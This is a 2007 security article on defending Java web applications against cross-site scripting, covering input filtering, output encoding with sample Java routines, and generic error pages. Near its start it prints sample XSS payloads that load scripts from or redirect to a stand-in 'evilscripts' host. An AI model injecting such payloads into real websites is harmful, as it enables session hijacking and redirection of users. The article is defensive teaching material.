TLAnews.com

Information for Security Concerned People

Cross Site Scripting Java Input Validation

16.09.2007

This is the second article in a series on handling Java web application input. In part one, I talked about validation best practices and SQL injection attacks. In this article, I will continue the theme, and in particular will talk about the threat of cross-site scripting, as well as looking at correctly handling exceptions in J2EE web applications.

Cross-Site Scripting

Cross-site scripting, also known as XSS, is an attack against dynamic web applications. It occurs when an application accepts, without checking it, input from an external source that contains units of instruction. This input is then sent as part of the response to a delivery medium such as a web browser, and may also be persisted to a data store for future display. The success of such an attack depends heavily on how the web browser distinguishes instruction from regular content, that is, markup from data. Let us consider a simple example, shown in Figure 1, that allows the posting of movie reviews.



 

Figure 1 shows a web page that allows a user to post a movie review. Let us consider what would happen if a movie review was posted containing some JavaScript code:


  <script> alert("Hello Script Injection"); </script> 

The possible result of this is shown in Figure 2.

 

 

Figure 2. Script injection attack

As you can see, this input results in the JavaScript being executed any time a user requests the web page. In this case, it displays a harmless alert window. An attacker initiates this attack by interacting with the application, passing data through HTML form input fields. This data is then sent to the web server via an HTTP POST request. On receipt, the web server passes this request to the J2EE web container, which in turn parses the HTTP request to extract pertinent data: HTTP headers, request data, referrer URL, etc. This data is then used to construct a javax.servlet.http.HttpServletRequest that provides a programmer-friendly interface to this data. The application uses this object to retrieve the movie data, performing simple validation to ensure that required data has been set.

The problem with this approach is that the validation employed does not protect against an XSS attack, because the input data may contain characters that are considered special under the HTML specification. The HTML 4.0 specification defines around 250 character entity references for special characters. However, in relation to an XSS attack, commonly used characters include <, >, &, {, }, [, ], and %. An attacker can use these characters and others to construct a series of attack strings that the receiving web browser will interpret as units of instruction and execute accordingly.
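To make the flaw concrete, here is a minimal sketch of the kind of handling just described. The class and method names (NaiveReviewPage, isValid, renderReview) are hypothetical and are not taken from the movie review application; the sketch only assumes that the application checks that a value is present and then copies it into the page.

```java
/** Hypothetical sketch of a page fragment builder that trusts its input. */
final class NaiveReviewPage {

    /** Returns true when the review passes a "required field" check only. */
    static boolean isValid(String review) {
        return review != null && review.trim().length() > 0;
    }

    /** Builds the HTML fragment by plain concatenation, with no encoding. */
    static String renderReview(String review) {
        if (!isValid(review)) {
            throw new IllegalArgumentException("review is required");
        }
        // The review text is copied into the markup verbatim, so any tags
        // it contains become part of the page the browser parses.
        return "<div class=\"review\">" + review + "</div>";
    }
}
```

A review containing a script element passes isValid and comes back from renderReview with the element intact, which is exactly what the browser then executes.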

Now consider the following tag:


  <script type="text/javascript" src="http://evilscripts/js/evilScript.js"></script>

This results in the malicious script evilScript.js being downloaded and executed. A similar attack looks like this:


  <script type="text/javascript">     
    location.href="http://evilscripts/js/evilScriptPage.html";
  </script>

The result of this would be the user being redirected to evilScriptPage.html on every load of the page.

An anchor can hide a script, too:


  <A HREF="http://evilscripts.com/evilScriptPage.html?script=
  <SCRIPT SRC='http://evilscripts/js/evilScript.js'></SCRIPT>">
  Go to Movies web site</A> 

This is a link that sends a user to http://evilscripts.com/evilScriptPage.html and executes the evilScript.js script.

There are also "inline" script attacks, which work in newer browsers.


  <body onload="javascript:alert('Hello Inline Script Attack');">

Finally, there are attacks that launch when the user mouses over them:


  <img
    onmouseover="location.href='http://evilscripts/js/evilScriptPage.html';" 
    src="images/example.gif" id="example"
    width="482" height="297" alt="example" />

This is an image that redirects a user to http://evilscripts/js/evilScriptPage.html when the mouse is placed over the image.

Tags that Allow for Cross-Site Scripting

Common exploits include the use of <script>, <applet>, <object>, <embed>, and standard HTML tags.

Tag Description
<APPLET> Used to embed a Java applet in a document. This tag is deprecated in HTML 4.0 in favor of the object tag.
Attributes:
  • code: URL that points to the class of the applet.
  • codebase: Indicates the base URL of the applet if the code attribute is relative.
  • name: Defines a unique name for the applet (to use in scripts).
  • object: Defines the name of the resource that contains a serialized representation of the applet.
<EMBED> Adds an object to a document. Commonly used to add multimedia (an applet, ActiveX control, or Flash or sound files) to your HTML page.
Attributes:
  • autostart: Indicates if the sound track should start automatically upon loading.
  • code: Specifies the class name of the Java code to be executed (IE only).
  • codebase: Specifies the base URL for the application (IE only).
  • data: Defines a URL that refers to the object's data.
  • endtime: Indicates the spot on the sound track where to stop playing.
  • hidden: Hides the media file or player from view when set to true.
  • name: Specifies the name for the object for later use by a script.
  • pluginspage: Specifies the location of the plugin software needed to run the sound file. This attribute is needed only if the plugin software is not one of the common ones that are already installed on the computer. Supported only by Netscape Navigator.
  • pluginURL: Specifies the location of the software needed to install the specified plugin (JAR Installation Manager). This attribute is needed only if the plugin software is not one of the common ones already installed on the computer. Supported only by Netscape Navigator.
  • playcount: Specifies the number of times to play the sound (IE only).
  • starttime: Indicates the spot on the track where to begin playing.
  • type: Defines the MIME type of data specified in the data attribute.
<OBJECT> Defines an embedded object. Use this element to add multimedia (an applet, ActiveX control, etc.) to your HTML page. This element allows you to specify the data and parameters for objects inserted into HTML documents, and the code that can be used to display/manipulate that data.
Attributes:
  • archive: A space-separated list of URLs to archive. The archive contains resources relevant to the object.
  • classid: Defines a class ID value as set in the Windows Registry or a URL.
  • codebase: Defines where to find the code for the object.
  • codetype: The internet media type of the code referred to by the classid attribute.
  • data: Defines a URL that refers to the object's data.
  • name: Specifies the name of the object to be referenced by scripts on the page.
  • type: Defines the MIME type of data specified in the data attribute.
<SCRIPT> Defines an executable script, such as JavaScript or VBScript.
Code within this element is executed immediately when a page is loaded, if it is not in a function or due to the execution of an event.
Attributes:
  • type: Replaces the language attribute as of HTML 4.0. Specifies the language of the script. Value must be a valid MIME type.
    Possible values: text/ecmascript, text/javascript, text/jscript, text/vbscript, text/vbs, text/xml.
  • src: Defines a URL to a file that contains the script (instead of inserting the script into your HTML document, you can refer to a file that contains the script).
  • charset: Defines the character encoding used in the script.
Example: <script type="text/javascript">document.write("Hello JavaScript!") </script>
Output: Writes "Hello JavaScript!" to the web page.

A script injection attack does not necessarily have to be initiated with malicious intent. For example, a well-meaning user could enter standard HTML markup and alter page formatting, seriously defacing the look of a website.

Threats Of Cross-Site Scripting

The exploits achieved through script injection vary across a large spectrum. This is due to the nature of the attack: any website that lets an attacker insert instructions into a web page opens the application up to a variety of attacks with serious ramifications. An exploit is heavily dependent on the environment in which the malicious code executes, such as the privileges granted to the account under which the application runs and the programming language used. Some common exploits achieved through cross-site scripting include:

  • The attacker can steal cookies by inserting a script into a web page of a vulnerable website. This script collects user cookies and then sends them to the attacker. The attacker can then impersonate a user (which is particularly dangerous in a single sign-on environment), possibly gaining access to sensitive data such as credit card numbers and passwords.
  • The attacker can insert a malicious link into a popular website, usually encoding it to make it difficult to discern from a well-meaning link; when a user clicks on the link, a malicious script is executed. A link could also be used to redirect a user to a malicious web page that takes on the appearance of a trusted site, possibly requesting security credentials.
  • User input may be intercepted. An attacker could write a script that monitors user input and sends sensitive data back to the attacker.
  • An attacker can trick the web server into executing malicious code in the same context as trusted code. This can give the attacker access to the web server and possibly, network access.
  • An attacker can deface a website, rendering it unreadable or adding any content they see fit.
  • An attacker can use the application logger to inject malicious input into the application. This input can be executed if logs are viewed in HTML form. Therefore, a good security practice is to wrap the application logger using a custom implementation that filters malicious input.
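The logger-wrapping idea in the last point can be sketched as follows. SafeLogger and its methods are hypothetical names, and the choice of which characters to neutralize is an assumption made for illustration; a real application would adapt it to the way its logs are viewed.

```java
import java.util.logging.Level;
import java.util.logging.Logger;

/** Hypothetical wrapper that neutralizes markup before a message is logged. */
final class SafeLogger {

    private final Logger delegate;

    SafeLogger(Logger delegate) {
        this.delegate = delegate;
    }

    /** Escapes the HTML tag delimiters and collapses line breaks. */
    static String sanitize(String message) {
        if (message == null) {
            return "";
        }
        return message
                .replace("&", "&amp;")          // must run first
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replaceAll("[\\r\\n]+", " ");  // no forged log lines
    }

    /** Logs the sanitized message at WARNING level. */
    void warning(String message) {
        delegate.log(Level.WARNING, sanitize(message));
    }
}
```

Escaping the ampersand before the other characters matters: done in the opposite order, the ampersands produced by the earlier replacements would themselves be escaped.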

Preventing Cross-Site Scripting

One approach to prevention is to configure the web browser to disable scripting. Unfortunately, this is not always a viable option, as it affects functionality and, worse, relies on every user configuring their own browser. Therefore we need to plug in some validation code. However, before banging out any code, it is important to understand that an attacker will take measures to evade any validation code that tests for dangerous special characters. This is normally done by submitting alternative representations of the special characters: URL (percent) encoding with hexadecimal codes, numeric character references in hexadecimal or decimal, or character entity references for a particular character encoding, like the following:

Char           <    >    "    :    {    }    [    ]    ;
Hex Char Code  %3c  %3e  %22  %3a  %7b  %7d  %5b  %5d  %3b
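The evasion can be illustrated with a short sketch. The class EncodedInputDemo and its methods are hypothetical; java.net.URLDecoder stands in here for whatever later step ends up decoding the percent-encoded form, for example when an attacker encodes the input twice so that one layer survives the container's own decoding.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;
import java.util.regex.Pattern;

/** Hypothetical demo: a raw-character check misses percent-encoded input. */
final class EncodedInputDemo {

    // The kind of character class a simple "dangerous character" test uses.
    private static final Pattern SPECIAL = Pattern.compile("[<>{}\\[\\];&]");

    /** Returns true if any of the listed special characters is present. */
    static boolean containsSpecialChars(String s) {
        return SPECIAL.matcher(s).find();
    }

    /** Decodes %XX sequences; UTF-8 is always available on a JVM. */
    static String percentDecode(String s) {
        try {
            return URLDecoder.decode(s, "UTF-8");
        } catch (UnsupportedEncodingException e) {
            throw new IllegalStateException(e);
        }
    }
}
```

For the input %3cscript%3ealert(1)%3c/script%3e, containsSpecialChars reports nothing suspicious, yet the same test on the result of percentDecode finds the angle brackets.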

In order to be able to detect special characters, it is vital that the web server explicitly set the character set of any web page. If the character set is not explicitly set in the HTML output, an attacker can set a different character set. An attacker can then pass malicious content containing special characters in a different encoding, which the validation code cannot recognize, rendering it ineffective. The character set of a web page can be set by specifying the meta tag in the head section of an HTML page:


  <HEAD>
        <META http-equiv="Content-Type"
        content="text/html; charset=ISO-8859-1">
  </HEAD>

The above declaration sets the character set to ISO-8859-1 (Latin-1), which covers Western European languages. It is therefore important, when writing validation code, to be aware of what character set is being used in order to correctly recognize special characters.

Once this is set, the next step is to craft some validation code. When writing this code, it is critical to understand that every application is different (different internationalization requirements, etc.) and secure coding practices that protect one application may not protect another. Therefore, before writing any code, it is important to play the role of the attacker, looking for any entry points through which data is input from an unknown source. Once these points have been identified, it is important to construct attack strings in order to understand how your application can be exploited. When it comes to writing the validation code, there are two main choices: filtering and encoding.

Filtering

The safest and perhaps most performant method of preventing an attack is to accept only data that is deemed valid and reject everything else, possibly returning an error to the client. For example, if the input data is expected to be numeric, then ensure that this is the case by rejecting any input that is not.


  final String inputStr = request.getParameter("input");
  final String numericPattern = "^\\d+$";
  if (inputStr == null || !inputStr.matches(numericPattern))
  {
        /* invalid input, do something with error*/
  }
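The same accept-only-what-is-valid idea extends to short text fields. The following is a minimal sketch, assuming a hypothetical movie title field limited to 100 characters; the class name TitleValidator and the exact set of permitted punctuation are illustrative choices, not requirements from the article.

```java
import java.util.regex.Pattern;

/** Hypothetical whitelist validator for a short free-text field. */
final class TitleValidator {

    // Letters, digits, spaces and a little punctuation; 1 to 100 characters.
    // Compiled once, because the pattern never changes.
    private static final Pattern ALLOWED =
            Pattern.compile("[\\p{L}\\p{N} .,:!?-]{1,100}");

    /** Returns true only if the whole input consists of allowed characters. */
    static boolean isValidTitle(String input) {
        // matches() requires the entire input to fit the pattern
        return input != null && ALLOWED.matcher(input).matches();
    }
}
```

Listing what is allowed, rather than what is forbidden, means that characters nobody thought to ban are rejected by default.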

Although this is the best form of prevention and would work well for the movie review example, it may not be practical to reject all data. In this case, a cleaning routine can be used, which checks for the existence of special characters and replaces each with another character, such as a space.


  /* regular expression that 
   * tests for the existence of malicious characters 
   * and replaces them with a space. */
        
  final String filterPattern = "[<>{}\\[\\];&]";
  final String cleanedStr = inputStr.replaceAll(filterPattern, " ");
 

Encoding

In certain situations, it is not viable to reject certain input. For example, consider an online forum that allows programmers to post code. If code is filtered, it will not display correctly, making messages difficult to understand. In this case, we cannot apply filtering and need an alternative approach.

One such approach is to encode the data. Encoding transforms harmful characters into their display equivalents by using character entity references or numeric character references. For example, < and > will be transformed into &lt; and &gt; respectively. However, when applying this approach, it is important to set the character set of the response, as shown earlier. This is needed because of the way the web server and the web browser exchange data over the wire. When a web server sends characters to a browser, it converts them into a series of bytes. When the browser receives these bytes, it converts them back into a stream of characters. The charset parameter of the Content-Type header specifies how this conversion is done. Likewise, when you write dynamic content using a JSP or in a servlet using response.getWriter(), the web container converts strings into bytes using the specified character set.

When encoding is used, the character references generated by the encoding routine are sent over the wire as byte sequences determined by that character set. If the character set is not set, the web browser may use a different character set to turn the received bytes back into characters. Because different character sets use different byte sequences to represent characters, encoded characters may then be transformed back into special characters, which destroys your encoding efforts.
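The byte-level mechanism can be seen in a few lines of plain Java. This is only an illustrative sketch: the class CharsetMismatchDemo is hypothetical, it uses java.nio.charset.StandardCharsets (Java 7 and later), and the UTF-8 and ISO-8859-1 pair was chosen because every JVM supports both. These two character sets agree on ASCII, so the sketch shows how text changes under a mismatch rather than reproducing an actual attack.

```java
import java.nio.charset.StandardCharsets;

/** Hypothetical demo of a sender/receiver character set mismatch. */
final class CharsetMismatchDemo {

    /** Encodes text as UTF-8 bytes, then decodes them as ISO-8859-1. */
    static String sendUtf8ReadLatin1(String text) {
        byte[] wire = text.getBytes(StandardCharsets.UTF_8);
        return new String(wire, StandardCharsets.ISO_8859_1);
    }

    /** Encodes and decodes with the same character set. */
    static String sendAndReadUtf8(String text) {
        byte[] wire = text.getBytes(StandardCharsets.UTF_8);
        return new String(wire, StandardCharsets.UTF_8);
    }
}
```

When both sides agree, the text survives the round trip. When they disagree, the single character U+00E9 (e with an acute accent) arrives as two different characters, because its two UTF-8 bytes are each read as one ISO-8859-1 character.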

The following simple routine encodes any input passed to it for display in a web browser, using decimal character references:


  public static String encode(String data)
  {
        final StringBuffer buf = new StringBuffer();
        final char[] chars = data.toCharArray();
        for (int i = 0; i < chars.length; i++) 
        { 
                // a numeric character reference is "&#", the decimal
                // character code, and a terminating semicolon
                buf.append("&#").append((int) chars[i]).append(';');
        }     

        return buf.toString();
  }


For example, the input:


    <script> alert("Hello Script Injection"); </script> 

is transformed into the following (line breaks added for readability):


        &#60;&#115;&#99;&#114;&#105;&#112;&#116;
        &#62;&#32;&#97;&#108;&#101;&#114;&#116;
        &#40;&#34;&#72;&#101;&#108;&#108;&#111;
        &#32;&#83;&#99;&#114;&#105;&#112;&#116;
        &#32;&#73;&#110;&#106;&#101;&#99;&#116;
        &#105;&#111;&#110;&#34;&#41;&#59;&#32;
        &#60;&#47;&#115;&#99;&#114;&#105;&#112;
        &#116;&#62;

This enables the browser to treat it as a harmless string and not as executable content. The JSP Standard Tag Library (JSTL) provides similar functionality through its standard out tag (<c:out>), which encodes the HTML special characters <, >, &, ' and " using character references. An important consideration when using encoding is that it can incur a performance penalty. Furthermore, as stated earlier, an attacker may enter a different representation of special characters when sending the data to the server (such as a hexadecimal representation). As a result, data should be decoded before encoding it.


  public static String decodeHex(final String data,
                                 final String charEncoding) 
  {
    if (data == null) 
    {
        return null;    
    }
    byte[] inBytes = null;  
    try 
    { 
        inBytes = data.getBytes(charEncoding); 
    } 
    catch (UnsupportedEncodingException e) 
    { 
        //use default charset
        inBytes = data.getBytes(); 
    } 
    
    byte[] outBytes = new byte[inBytes.length]; 

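    int b1;
    int b2;
    int j=0;
    for (int i = 0; i < inBytes.length; i++) 
    { 
        // decode only a complete %XX sequence with two valid hex digits
        if (inBytes[i] == '%' && i + 2 < inBytes.length) 
        { 
            b1 = Character.digit((char) inBytes[i + 1], 16); 
            b2 = Character.digit((char) inBytes[i + 2], 16); 
            if (b1 >= 0 && b2 >= 0) 
            { 
                outBytes[j++] = (byte) ((b1 << 4) + b2); 
                i += 2; 
                continue; 
            } 
        } 
        // a stray or truncated '%' and all other bytes are copied unchanged
        outBytes[j++] = inBytes[i]; 
    } 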
    
    String encodedStr = null;
    try 
    { 
        encodedStr = new String(outBytes, 0, j, charEncoding); 
    } 
    catch (UnsupportedEncodingException e) 
    { 
        encodedStr = new String(outBytes, 0, j); 
    } 

    return encodedStr; 
  }


The above code is used to decode any hexadecimal-encoded characters. It accepts a string containing the data to decode, along with the character set to decode the data to (such as UTF-8, 8859_1, etc).
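Putting the two steps together, decode first and then encode, might look like the sketch below. It swaps in the standard java.net.URLDecoder for the hand-written decoder and replaces only the five HTML metacharacters instead of every character; both are illustrative choices, and OutputEncoder and its methods are hypothetical names.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;

/** Hypothetical helper: decode percent-encoding, then escape for HTML. */
final class OutputEncoder {

    /** Replaces the five HTML metacharacters with character references. */
    static String escapeHtml(String data) {
        StringBuilder buf = new StringBuilder(data.length() + 16);
        for (int i = 0; i < data.length(); i++) {
            char c = data.charAt(i);
            switch (c) {
                case '<':  buf.append("&lt;");   break;
                case '>':  buf.append("&gt;");   break;
                case '&':  buf.append("&amp;");  break;
                case '"':  buf.append("&quot;"); break;
                case '\'': buf.append("&#39;");  break;
                default:   buf.append(c);
            }
        }
        return buf.toString();
    }

    /** Decodes %XX sequences first so that hidden characters get escaped. */
    static String decodeThenEscape(String data, String charEncoding) {
        if (data == null) {
            return null;
        }
        try {
            // Note: URLDecoder also turns '+' into a space and throws
            // IllegalArgumentException on a malformed %XX sequence.
            return escapeHtml(URLDecoder.decode(data, charEncoding));
        } catch (UnsupportedEncodingException e) {
            throw new IllegalArgumentException("unknown charset: " + charEncoding, e);
        }
    }
}
```

Because URLDecoder treats a plus sign as a space, this variant suits form-style data; input where a literal plus sign must survive would need the hand-written decoder instead.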

An important decision is where to apply the validation techniques. The two main places are on receipt of the request and when writing the response. It is generally a good idea to apply both, although how far to go with each will depend on the specific requirements of the application. Any input data should be validated on receipt, ensuring that it is of the required type whenever possible. Encoding should be performed when writing the response, because data does not necessarily enter through the web application: it can also arrive by other routes, such as through logging or by being entered directly into a database. A good practice for encoding output in a JSP page is to use a custom tag.

Error Reporting

During the process of conducting an attack, an attacker will usually pass some input that will result in a web server returning an error. A poorly designed error-handling infrastructure will allow an attacker to learn more about the system they are trying to exploit. An attacker can use this newfound knowledge to trigger a stronger attack the next time around. Therefore, it is critical to limit the information returned.

A best practice for handling this kind of situation is to return a generic error message to the client and log the error, including any resultant exceptions and the corresponding stack traces, to the application log file, possibly emailing a system administrator if persistent error conditions occur. A J2EE-compliant web container provides a nice fit for this scenario, using declarative error handling through the error-page element of the application deployment descriptor web.xml. The error-page element allows you to map HTTP response codes (such as 500 Internal Server Error and 404 Not Found), as well as thrown exceptions, to a specific error-handling page:


  <!-- Maps the 404 Not Found response code
    to the error page /errPage404 -->
  
  <error-page>
      <error-code>404</error-code>
      <location>/errPage404</location>
  </error-page>
  
   <!-- Maps any thrown ServletExceptions
    to the error page /errPageServ -->
   <error-page>
      <exception-type>javax.servlet.ServletException</exception-type>
      <location>/errPageServ</location>
  </error-page>
  
   <!-- Maps any other thrown exceptions
   to a generic error page /errPageGeneric -->
  <error-page>
      <exception-type>java.lang.Throwable</exception-type>
      <location>/errPageGeneric</location>
  </error-page>


The <location> element specifies the resource (servlet, JSP, etc.) that will handle an error, the <error-code> element specifies the error code to be handled, and the <exception-type> element specifies the exception to be handled. For instance, in the above example, any response sent with the error code 404 will be intercepted by the web container and forwarded to the resource located at /errPage404. Likewise, a thrown javax.servlet.ServletException will be forwarded to /errPageServ, and any other thrown exception will be forwarded to /errPageGeneric. The exception and error code can be retrieved by a servlet handling the error using:


  Throwable throwable = (Throwable)
  request.getAttribute("javax.servlet.error.exception");
        

  String status_code = ((Integer)
  request.getAttribute(
    "javax.servlet.error.status_code")).toString( );

The error details can then be logged to a log file, and a generic error message can be returned to the client that contains no specific error details or stack traces that would aid an attacker.
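A minimal sketch of that split between what is logged and what is returned follows. To keep it runnable on its own it leaves out the servlet API: in an error-handling servlet, the throwable and status code would be the request attributes retrieved above. The class ErrorReporter and the idea of a random reference id linking the client message to the log entry are assumptions added for illustration.

```java
import java.util.UUID;
import java.util.logging.Level;
import java.util.logging.Logger;

/** Hypothetical helper separating what is logged from what the client sees. */
final class ErrorReporter {

    private static final Logger LOG =
            Logger.getLogger(ErrorReporter.class.getName());

    /**
     * Logs full details under a random reference id and returns a generic
     * message that carries only that id.
     */
    static String report(Throwable throwable, Integer statusCode) {
        String reference = UUID.randomUUID().toString();
        // Full details, including the stack trace, go to the log only.
        LOG.log(Level.SEVERE,
                "Error " + reference + " (status " + statusCode + ")",
                throwable);
        // The client sees no exception type, message, or stack trace.
        return "An unexpected error occurred. Reference: " + reference;
    }
}
```

The reference id lets support staff find the matching log entry without the response revealing anything about the failure itself.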

Conclusion

In this series, we looked at the importance of handling application input correctly. In particular, we looked at validation best practices as well as the threats of SQL injection and cross-site scripting. It is hoped that these articles have provided a good starting point for J2EE developers, helping them to understand and appreciate the seriousness of the very real and dangerous threat posed by inadequate data validation. The appearance of automated tools and the incorporation of new features into the various specifications and web browsers have resulted in attackers finding new and innovative ways to exploit an application through application input. An attacker can initiate an attack through a web browser by constructing attack strings and sending them via an HTTP GET request through URL tampering, via an HTTP POST request through HTML forms, or by other means. It is therefore critical that every possibility for data being input into an application from an external source is carefully analyzed, and that secure coding practices are put in place to meet the specific validation needs of the application in order to neutralize any threats.

Copyright © [Telecom and Logistics Associates Sàrl]. All rights reserved.
Revised: September 15, 2007.

All information provided is of a general nature and is not intended to address the circumstances of any particular individual or entity. Although we endeavor to provide accurate and timely information, there can be no guarantee that such information is accurate as of the date it is received or that it will continue to be accurate in the future. No one should act upon such information without appropriate professional advice after a thorough examination of the facts of the particular situation.

 Publications
  
 Christian ALT  
      
Telecom and Logistics Associates specializes in IT security. It works with its clients as an auditor or to prepare them for ISO 27001 certification of information systems security.

 

 

 

 
   